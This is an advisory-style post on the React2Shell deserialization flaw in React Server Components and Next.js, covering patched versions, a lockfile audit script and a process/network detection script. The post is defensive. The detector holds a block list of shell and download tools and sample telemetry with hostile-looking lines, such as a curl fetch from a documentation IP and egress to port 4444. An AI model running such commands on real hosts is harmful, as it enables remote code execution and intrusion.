CVE-2025-55182 “React2Shell” Threat and Mitigations


CVE-2025-55182, nicknamed React2Shell, is a critical security vulnerability (CVSS 10.0) affecting React Server Components (RSC) and related frameworks such as Next.js. It stems from an unsafe deserialization flaw in the RSC Flight protocol, which carries server payloads. When a server receives a specially crafted request, the payload is deserialized without proper validation, allowing arbitrary attacker-controlled data to influence execution logic. A detailed description is available from Microsoft.

Because of this flaw:

  • An attacker can trigger unauthenticated remote code execution (RCE) with a single malicious HTTP request; no credentials are required.
  • The vulnerability exists in default configurations of affected packages and frameworks. (wiz.io)
  • Exploitation has been observed in the wild, including delivery of cryptominers (e.g., XMRig), remote access trojans (RATs), and lateral movement.
  • Both Windows and Linux environments can be impacted depending on deployment context.

This makes React2Shell a high-impact issue for modern web apps that rely on RSC paradigms for server-side rendering and data flow.


🛠 Technical Root Cause

React2Shell arises because certain versions of RSC packages:

  1. Trust client-provided serialized payloads
  2. Fail to properly validate deserialized objects
  3. Allow attacker data to influence internal server execution paths

This combination results in prototype pollution and execution of untrusted code on the server process (Node.js), which can lead to full server compromise.

Affected components typically include:

  • react-server-dom-webpack
  • react-server-dom-parcel
  • react-server-dom-turbopack
  • Next.js server code paths that depend on those RSC pieces (NVD)

🛡 Mitigation and Defense Strategy

Microsoft’s guidance emphasizes layered mitigation with an emphasis on immediate patching and protective controls:

1. Immediate Patching

Ensure all React and Next.js dependencies are upgraded out of the vulnerable versions:

React (Server Components) patched versions:

  • 19.0.1
  • 19.1.2
  • 19.2.1
    (or later within the same release line)

Next.js patched versions:

  • 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7
  • 16.0.7
    (or later in the same line)

Action Steps:

  • Update dependencies in your package.json and rebuild.
  • Confirm that frameworks and tooling actually pulled in corrected RSC packages.
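The second action step is the one most often skipped: a bumped `package.json` does not guarantee that nested or transitively pinned copies of the RSC packages were replaced. The following is an added example (not code from Microsoft, React or Next.js) that audits a `package-lock.json` against the patched-version table listed above. It parses the lockfile's `packages` map, which keys every installed copy by its install path, so nested duplicates under another dependency's `node_modules` are found too. Versions below the listed fix in the same MAJOR.MINOR line are reported as vulnerable; a release line that is not in the table is reported as unknown rather than guessed. The sample lockfile at the bottom is constructed for illustration.

```javascript
// Added example, not code from Microsoft, React or Next.js: audit a
// package-lock.json against the patched-version table given in this post.
// Any version below the listed fix in the same MAJOR.MINOR line is flagged.

// Patched versions exactly as listed above. "(or later in the same line)"
// is implemented by comparing within the same MAJOR.MINOR.
const PATCHED = {
  "react-server-dom-webpack": ["19.0.1", "19.1.2", "19.2.1"],
  "react-server-dom-parcel": ["19.0.1", "19.1.2", "19.2.1"],
  "react-server-dom-turbopack": ["19.0.1", "19.1.2", "19.2.1"],
  next: ["15.0.5", "15.1.9", "15.2.6", "15.3.6", "15.4.8", "15.5.7", "16.0.7"],
};

// Own-property lookup so a path like "node_modules/constructor" cannot match
// something inherited from Object.prototype.
function tracked(name) {
  return Object.prototype.hasOwnProperty.call(PATCHED, name);
}

// Parse "MAJOR.MINOR.PATCH[-prerelease]" (optional leading "v").
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return { major: +m[1], minor: +m[2], patch: +m[3], pre: m[4] || null };
}

// semver ordering on the numeric triple; a prerelease sorts below its final
// release, so "19.2.1-canary-xyz" is still older than the 19.2.1 fix.
function compareVersions(a, b) {
  for (const k of ["major", "minor", "patch"]) {
    if (a[k] !== b[k]) return a[k] - b[k];
  }
  if (a.pre && !b.pre) return -1;
  if (!a.pre && b.pre) return 1;
  return 0;
}

// "patched" | "vulnerable" | "unknown" (release line not in the table, so the
// script does not guess) | "not-tracked" (package irrelevant to this CVE).
function classify(name, version) {
  if (!tracked(name)) return "not-tracked";
  const v = parseVersion(version);
  const fix = PATCHED[name].map(parseVersion)
    .find((p) => p.major === v.major && p.minor === v.minor);
  if (!fix) return "unknown";
  return compareVersions(v, fix) >= 0 ? "patched" : "vulnerable";
}

// package-lock.json v2/v3 keys "packages" by install path, e.g.
// "node_modules/next" or "node_modules/foo/node_modules/next" for nested copies.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    const name = path.split("node_modules/").pop();
    if (!tracked(name) || !entry.version) continue;
    findings.push({ path, name, version: entry.version, status: classify(name, entry.version) });
  }
  return findings;
}

// Constructed sample lockfile (not from any real project) covering each outcome.
const SAMPLE_LOCK = {
  packages: {
    "": { name: "sample-app", version: "1.0.0" },
    "node_modules/next": { version: "15.4.7" },
    "node_modules/react-server-dom-webpack": { version: "19.2.1" },
    "node_modules/react-server-dom-turbopack": { version: "19.2.1-canary-abc123" },
    "node_modules/some-lib/node_modules/react-server-dom-parcel": { version: "19.1.2" },
  },
};

// Usage: node audit-rsc.js [path/to/package-lock.json]; with no argument the
// constructed sample above is audited.
if (typeof require !== "undefined" && require.main === module) {
  const file = process.argv[2];
  const lock = file ? JSON.parse(require("fs").readFileSync(file, "utf8")) : SAMPLE_LOCK;
  for (const f of auditLockfile(lock)) {
    console.log(`${f.status.padEnd(11)} ${f.name}@${f.version}  (${f.path})`);
  }
}
```

Two design points are worth noting. Prerelease tags are treated as older than the final release, so a canary build stamped with the fixed version number is still reported as vulnerable, which is the conservative reading. The audit also reports every copy of a package rather than stopping at the first, because a hoisted top-level copy being patched says nothing about a nested copy pinned by another dependency.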

2. Prioritize Exposed Services

Focus rollout on internet-facing services first because those are most directly at risk from unauthenticated RCE. Use vulnerability management tooling (e.g., Microsoft Defender Vulnerability Management) to enumerate and prioritize fixes across large estates.


3. Web Application Firewalls (WAF)

As a compensating control during patch rollout:

  • Deploy Azure Web Application Firewall (WAF) custom rules designed to block known exploit patterns.
  • Microsoft has published JSON rule guidance for Azure WAF that helps block likely exploit payloads while patching is in progress.

4. Monitoring and Detection

Use telemetry and alerting to identify attempted or successful exploitation:

  • Enable Microsoft Defender XDR, Defender for Endpoint, and Defender for Cloud alerts related to RSC exploitation activity.
  • Monitor logs for suspicious Node.js process behavior, unusual network traffic, or unexpected commands originating from RSC server processes.
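The second bullet is easier to act on with a concrete rule. The following is an added example (not Microsoft's detection content and not from this post) that runs two behavioural rules over constructed process-creation and network events of the shape an EDR or auditd pipeline emits. Both rules rest on the same observation: a Node.js process serving RSC has no routine reason to launch a shell, an interpreter or a download tool, nor to open connections beyond its known backends. The suspicious-child list, the egress allowlist and all sample events are constructed for illustration; tune them to your own baseline.

```javascript
// Added example, not Microsoft's or this post's own detection content: two
// behavioural rules run over constructed process and network telemetry.

// Child images a web-app Node.js process should never launch. Illustrative
// list; extend or trim it against your own baseline.
const SUSPICIOUS_CHILDREN = new Set([
  "sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh",
  "curl", "wget", "nc", "ncat", "python", "python3", "perl",
]);

// Constructed egress allowlist for the sample app (host:port of its backends).
const ALLOWED_EGRESS = new Set(["db.internal:5432", "cache.internal:6379"]);

function baseName(imagePath) {
  return String(imagePath).split(/[\\/]/).pop().toLowerCase();
}

function isNodeImage(imagePath) {
  const b = baseName(imagePath);
  return b === "node" || b === "node.exe";
}

// Walk the parent chain (bounded) so that node -> sh -> curl is attributed to
// the node server and not lost because curl's direct parent is sh.
function hasNodeAncestor(ev, byPid, maxDepth = 5) {
  let cur = ev;
  for (let depth = 0; depth < maxDepth && cur; depth++) {
    if (isNodeImage(cur.parentImage)) return true;
    cur = byPid.get(cur.parentPid);
  }
  return false;
}

// Rule 1: a node server (directly or via ancestry) launching a shell,
// interpreter or download tool.
function evaluateProcess(ev, byPid) {
  const child = baseName(ev.image);
  if (!SUSPICIOUS_CHILDREN.has(child)) return null;
  if (!hasNodeAncestor(ev, byPid)) return null;
  return {
    rule: "node-spawns-shell",
    severity: child === "curl" || child === "wget" ? "medium" : "high",
    host: ev.host, pid: ev.pid, parentPid: ev.parentPid, detail: ev.commandLine,
  };
}

// Rule 2: a node process connecting somewhere that is not an allowed backend.
function evaluateNetwork(ev) {
  if (!isNodeImage(ev.image)) return null;
  const dest = `${ev.destHost}:${ev.destPort}`;
  if (ALLOWED_EGRESS.has(dest)) return null;
  return { rule: "node-unexpected-egress", severity: "medium",
           host: ev.host, pid: ev.pid, detail: dest };
}

// Evaluate a batch; process events are indexed by pid first so ancestry
// lookups work regardless of event order.
function scanEvents(events) {
  const byPid = new Map();
  for (const ev of events) if (ev.type === "process") byPid.set(ev.pid, ev);
  const alerts = [];
  for (const ev of events) {
    const a = ev.type === "process" ? evaluateProcess(ev, byPid)
            : ev.type === "network" ? evaluateNetwork(ev) : null;
    if (a) alerts.push(a);
  }
  return alerts;
}

// Constructed sample telemetry (not real captures). 203.0.113.0/24 is a
// documentation address range.
const SAMPLE_EVENTS = [
  { type: "process", host: "web-01", pid: 4102, parentPid: 4100,
    parentImage: "/usr/bin/node", image: "/usr/bin/node",
    commandLine: "node worker.js" },                        // normal: node -> node
  { type: "process", host: "web-01", pid: 4210, parentPid: 4100,
    parentImage: "/usr/bin/node", image: "/bin/sh",
    commandLine: "sh -c 'uname -a'" },                      // alert: node -> sh
  { type: "process", host: "web-01", pid: 4211, parentPid: 4210,
    parentImage: "/bin/sh", image: "/usr/bin/curl",
    commandLine: "curl http://203.0.113.10/x" },            // alert via ancestry
  { type: "process", host: "web-02", pid: 880, parentPid: 870,
    parentImage: "C:\\Program Files\\nodejs\\node.exe",
    image: "C:\\Windows\\System32\\cmd.exe",
    commandLine: "cmd.exe /c whoami" },                     // alert: Windows variant
  { type: "network", host: "web-01", pid: 4100, image: "/usr/bin/node",
    destHost: "db.internal", destPort: 5432 },              // allowed backend
  { type: "network", host: "web-01", pid: 4100, image: "/usr/bin/node",
    destHost: "203.0.113.10", destPort: 4444 },             // alert: unknown egress
];
```

Running `scanEvents(SAMPLE_EVENTS)` yields four alerts: the `sh` and `cmd.exe` children at high severity, the `curl` grandchild at medium severity because the ancestry walk ties it back to the node parent, and the unexpected egress from the node process. The ancestry walk is bounded so a malformed or cyclic parent chain cannot hang the scanner. A node process that legitimately shells out (for example a build step) will trip rule 1; the right response is to allowlist that specific command line on the affected hosts, not to drop the rule.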

Summary of Defender’s Recommendations

A robust defense against React2Shell should include:

  • Rapid dependency patching.
  • Exposed attack surface prioritization.
  • Layered defensive controls (WAF + monitoring).
  • Vulnerability management and continuous detection workflows.

With these measures, the attack surface is significantly reduced and malicious exploitation can be detected and blocked before it leads to full compromise.